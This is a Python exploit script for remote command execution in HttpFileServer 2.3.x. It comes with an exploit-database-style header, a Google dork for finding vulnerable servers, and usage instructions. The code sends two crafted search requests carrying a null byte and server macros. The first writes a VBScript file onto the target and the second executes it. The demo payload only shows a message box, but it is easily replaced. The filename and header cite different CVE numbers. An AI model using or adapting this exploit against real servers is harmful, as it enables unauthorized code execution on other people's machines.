cve-2014-6287.py

#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Comment: Modified by Fabian Martinez Portantier
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-7226

#Usage : python Exploit.py <Target IP address> <Target Port Number>


import urllib2
import sys

file_path = 'C:\Users\Public\script.vbs'
file_code = 'MsgBox("Hacked")'

ip = sys.argv[1]
port = sys.argv[2]

step1 = 'save|' + file_path + '|' + urllib2.quote(file_code)
step2 = 'exec|cscript.exe%20' + urllib2.quote(file_path)

urllib2.urlopen("http://"+ip+":"+port+"/?search=%00{.+"+step1+".}")
 
urllib2.urlopen("http://"+ip+":"+port+"/?search=%00{.+"+step2+".}")